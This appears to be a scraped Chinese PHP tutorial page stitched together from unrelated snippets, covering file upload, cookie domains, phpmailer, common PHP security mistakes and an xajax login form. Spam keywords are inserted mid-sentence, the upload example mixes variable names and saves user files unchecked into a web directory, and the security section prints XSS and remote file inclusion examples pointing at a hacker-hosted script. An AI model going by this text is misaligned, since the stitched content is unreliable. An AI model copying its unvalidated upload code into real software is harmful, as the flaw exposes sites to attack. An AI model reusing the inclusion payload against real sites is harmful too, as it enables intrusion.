PHP入门

刚用PHP写了一个网站在线人数的程序，请大家进来指点下！

这是一个简单的投票程序，对于刚学PHP和朋友来说是一个很不错的入门程序。在这里给大家介绍一下，希望能对朋友们有所帮助。

/************/

config.php

$path=$_SERVER["DOCUMENT_ROOT"];//服务器路径        

$i = 0;                 

这段代码是ThinkPHP框架中的，感觉很常用，所以单独拎出来，大家共同学习一下。

网路广告，变成了 Internet 上的热门学问。而 468x60 更变成了广告人员绞尽脑汁的尺寸。
　　在处理广告时，若能直接使用浏览器将广告的 468x60 图档送到处理广告的伺服器中，相信是件很舒服的事，不用再开 FTP 程式，搞大半天只为了 upload。

　　这个问题，是所有 Web CGI 程式的痛，包括 ASP、Prel....双缘敬老院等等，都需要再经过系统元件的增加才能达成。号称最强的 Web CGI 程式: PHP，在这方面的表现没有令人失望，甚至傲视其它的 CGI 工具。

　　File Upload 功能在 RFC 1867 文件有有详细的说明，是利用特殊的文件格式 (content-type) multipart/form-data。值得注意的是浏览器一定要用 Netscape 3.0 以上或 MS Internet Explorer 4.0 以上的版本才能将档案上传。

　　先看下面的 HTML 原始码


< form enctype="multipart/form-data" action="next.php" method=post >
您的大名: < input type=text name=user >< br >
档案名称: < input name="myfile" type="file" >< br >
< input type="submit" value="送出" >
< /form >

　　在 form 的标签中，要加入 enctype="multipart/form-data" 的字串，表示使用者输入的资料上有档案上传，同时 method 一定要用 POST 而不能用 GET。

　　在上面的码中，若使用者姓名填入 Wilson Peng，并选 c:myphoto.gif 的档案，在使用者按下送出键后，浏览器则传送出下面的 POST 资料。 安装卫星电视


Content-type: multipart/form-data, boundary=AaB03x

--AaB03x
content-disposition: form-data; name="user"

Wilson Peng
--AaB03x
content-disposition: form-data; name="myfile"
Content-type: multipart/mixed, boundary=BbC04y

--BbC04y
Content-disposition: attachment; filename="myphoto.gif"
Content-type: image/gif
Content-Transfer-Encoding: binary

...myphoto.gif 内容略...
--BbC04y--
--AaB03x--


　　看到上面的资料中，boundary=AaB03x 即为分开不同栏位资料的讯息，其中的 AaB03x 编码方法，视浏览器的版本不同而异，通常是浏览器杂凑产生的。照明工程之后就可以看到用 --AaB03x 来隔开不同的栏位。

以上面为例，处理 form 的 action 程式 next.php，会主动产生四个变数，见下表

变数名 说明
$myfile 即上传的档案内容
$myfile_name 上传档案在使用者端的名称
$myfile_size 上传档案的大小
$myfile_type 上传档案的格式，如 "image/gif"


　　在 next.php 程式要做的最重要动作，就是好好的使用这四个变数，否则程式一结束，使用者上传的档案就消失了。因此，要先将 $myfile 复制到存放广告图的目录中茅台酒

copy($banner,"/home1/biglobe3/ad/".$banner_name);

　　这行程式就是将档案存在 /home/htdocs/ad 的目录中，就上面的例子而言，就将档案存到 /home/htdocs/ad/myphoto.gif。重要的是，存放的目录不能是 Web Server 无法读到的目录，而应放在网站的 Homepage 所在目录中，才可以在网路上看到。

　　或许程式要更细部的处理，例如比对取得的档案大小与系统回报的是否相同....等等，就可以用 $myfile_size 变数了

以前真没在意cookie的作用域问题，可能以前用.com域名没出过问题,今天用公司的一个cn域名测试，怎么也不能实现cookie共享，后来采用js设置cookie，在另外一台服务器上共享cookie成功，真叫气人！翻阅了一下php的cookie 规范 ，里面有这么一段

Only hosts within the specified domain can set a cookie for a domain and domains must have at least two (2) or three (3) periods in them to prevent domains of the form: ".com", ".edu", and "va.us". Any domain that fails within one of the seven special top level domains listed below only require two periods. Any other domain requires at least three. The seven special top level domains are: "COM", "EDU", "NET", "ORG", "GOV", "MIL", and "INT".

看出来了吧，真他娘的草蛋！除了"COM", "EDU", "NET", "ORG", "GOV", "MIL", and "INT"这几个后缀的域名可以设置二级作用域，其他的域名至少三级才可以，也就是说想通过设置作用域为b.cn来实现a.b.cn和c.b.cn下的 cookie共享用php是不行的，php只能实现作用域b.a.cn下的d.b.a.cn和e.b.a.cn间的cookie共享，希望大家注意，再遇到此类问题，别浪费时间拼命的测试了……

我刚刚安装了PHP6 DEV版本，决定测试一下PHP6的新特性-PHP的Unicode支持。我并没有打算讲PHP6的新特性或者是Unicode，下面仅仅是我做的关于Unicode的测试。

发送邮件是一个经常使用的功能，但是php的默认支持并不是很好，这里介绍一个很好的开源模块：phpmailer，此模块功能比较全面，支持SMTP验证。下面就简单介绍一下它的使用方法：

PHP是个伟大的web开发语言，灵活的语言，但是看到php程序员周而复始的犯的一些错误。我做了下面这个列表，列出了PHP程序员经常犯的10中错误，大多数和安全相关。看看你犯了几种

1.不转意html entities

  一个基本的常识：所有不可信任的输入（特别是用户从form中提交的数据） ，输出之前都要转意。

echo $_GET[''usename''] ;


这个例子有可能输出：

<scrīpt>/*更改admin密码的脚本或设置cookie的脚本*/</scrīpt>

这是一个明显的安全隐患，除非你保证你的用户都正确的输入。

如何修复 ：

我们需要将"< ",">","and" 等转换成正确的HTML表示(< , >'', and ")，函数htmlspecialchars 和 htmlentities()正是干这个活的。

正确的方法：

echo htmlspecialchars($_GET[''username''], ENT_QUOTES);




2. 不转意SQL输入
我曾经在一篇文章中最简单的防止sql注入的方法(php+mysql中)讨论过这个问题并给出了一个简单的方法 。有人对我说，他们已经在php.ini中将magic_quotes设置为On，所以不必担心这个问题，但是不是所有的输入都是从$_GET, $_POST或 $_COOKIE中的得到的！
如何修复：

和在最简单的防止sql注入的方法(php+mysql中)中一样我还是推荐使用mysql_real_escape_string()函数


正确做法：
<?php
$sql = "UPDATE users SET
name=''.mysql_real_escape_string($name).''
WHERE id=''.mysql_real_escape_string ($id).''";
mysql_query($sql);
?>






3.错误的使用HTTP-header 相关的函数: header(), session_start(), setcookie()
遇到过这个警告吗?"warning: Cannot add header information - headers already sent [....]

每次从服务器下载一个网页的时候，服务器的输出都分成两个部分：头部和正文。
头部包含了一些非可视的数据，例如cookie。头部总是先到达。正文部分包括可视的html，图片等数据。
如果output_buffering设置为Off，所有的HTTP-header相关的函数必须在有输出之前调用。问题在于你在一个环境中开发，而在部署到另一个环境中去的时候，output_buffering的设置可能不一样。结果转向停止了，cookie和session都没有正确的设置........。

如何修复:
确保在输出之前调用http-header相关的函数，并且令output_buffering = Off
。



4. Require 或 include 的文件使用不安全的数据
再次强调：不要相信不是你自己显式声明的数据。不要 Include 或 require 从$_GET, $_POST 或 $_COOKIE 中得到的文件。


例如:
index.php
<?
//including header, config, database connection, etc
include($_GET[''filename'']);
//including footer
?>


现在任一个黑客现在都可以用:http://www.yourdomain.com/index.php?filename=anyfile.txt
来获取你的机密信息，或执行一个PHP脚本。


如果allow_url_fopen=On，你更是死定了：
试试这个输入：
http://www.yourdomain.com/index.php?filename=http%3A%2F%2Fdomain.com%2Fphphack.php

现在你的网页中包含了http://www.youaredoomed.com/phphack.php的输出. 黑客可以发送垃圾邮件，改变密码，删除文件等等。只要你能想得到。

一、xajax与其它ajax框架的比较
xajax功能很简单，但很灵活！~它不象其它一些大的框架，功能确实强大，但执行速度不敢恭维。。功能虽多，但不够灵活。api多，学起来简直如同学习一门新的语言。
xajax就没那么复杂，手册只有一页html，如下：
http://javascript.chinahtml.com/2006/javascript-11398213503517.shtml
二、xajax功能介绍
xajax的功能比较简单，但就因为简单，所以灵活。同时，这也要求使用者要对javascript / vbs 客户端脚本有一定的了解。因为它的功能是比较活的。可以说单纯使用xajax，什么也做不出，但配合js / vbs 又什么都做的出。
xajax主要是使用xajaxResponse这个类，它提供了一些方法，举例如下：
1、addAlert($sMsg)
弹出警告
2、addscript($sJS)
执行某段js
3、$objResponse->addAssign("","","")
给页面中的某个元素附值，或者修改其属性
等等。。。。

所以xajax不是死的，它不能做出XXX XXX功能来，但是它可以灵活的控制客户端的js / vbs，去完成我们要实现的效果。

三、xajax安装配置
不需要特别的安装和配置，只要下载其文件包，解压到网站目录中
下载地址：
http://www.xajaxproject.org/

三、用xajax做会员注册和登陆
1、数据库
采用mysql5.0，数据库名zl 表名zl_user   表结构
id             int(11)       auto_increment
zl_user      varchar(50)
zl_pwd      varchar(50)
email        varchar(50)



2、reg.php   注册文件(内有说明)

<?php
      require_once("inc/xajax.inc.php");
//使用xajax则必须首先引入xajax.inc.php
      $xajax = new xajax("inc/signup.php");
//创建一个xajax对象，为singup.php
      $xajax->registerFunction("processForm");
//使用singup.php里的processForm函数
?>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<link rel="stylesheet" href="http://blogbeta./css/style.css" type="text/css">
<title>无标题文档</title>  
<?php $xajax->printJavascript(''inc/''); ?> 
<script type="text/javascript">
         function submitSignup()
         {
             xajax.$(''submitButton'').disabled=true;
   &